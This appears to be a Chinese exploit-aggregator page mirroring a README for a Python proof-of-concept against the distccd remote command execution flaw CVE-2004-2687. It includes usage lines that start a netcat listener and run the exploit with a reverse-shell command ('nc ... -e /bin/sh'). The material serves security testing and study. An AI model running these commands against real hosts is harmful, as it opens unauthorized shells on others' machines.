POC详情: 77e85dbb9f1a58b00635d848fa7fa5fa7d52938c

来源
关联漏洞
标题: Apple Xcode Tools 配置错误漏洞 (CVE-2004-2687)
描述:用于XCode 1.5版本及其他版本的distcc 2.x版本配置对于服务器端口的访问不限制时,远程攻击者可以借助编辑工作执行任意命令,该漏洞被无授权检查的服务器执行。
介绍
# distccd_rce_CVE-2004-2687

🖥️ -n3rdyn3xus-
#️⃣ CVE-2004-2687
#️⃣ Upgrade to Python3

Overview

This repository contains a Proof of Concept (PoC) exploit for the distccd vulnerability identified as `CVE-2004-2687`. The vulnerability exists in the `distccd` daemon, which is part of the distcc distributed C/C++ compilation system. When improperly configured, `distccd` allows remote attackers to execute arbitrary commands on the server without any authentication.
Vulnerability Details

distcc is designed to distribute compilation tasks across multiple machines to speed up the build process. However, if the distccd daemon is not properly secured, it exposes a remote code execution (RCE) vulnerability. This occurs because the daemon listens on a network port and accepts commands from any client, allowing them to execute shell commands on the server as the user running the daemon.

The vulnerability has been assigned `CVE-2004-2687` and affects `distccd` versions prior to 3.1. When exploited, an attacker can gain shell access to the vulnerable machine, leading to potential compromise of the entire system.


	nc -lvp 4444
	python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"

Vulnerability :

![image](https://user-images.githubusercontent.com/66146701/124954485-9916f480-dfc2-11eb-8623-3b802610200b.png)

Exploit :

![image](https://github.com/user-attachments/assets/79291800-e6ec-44a4-a942-ed1018998204)
文件快照

[4.0K] /data/pocs/77e85dbb9f1a58b00635d848fa7fa5fa7d52938c ├── [2.7K] distccd_rce.py └── [1.4K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。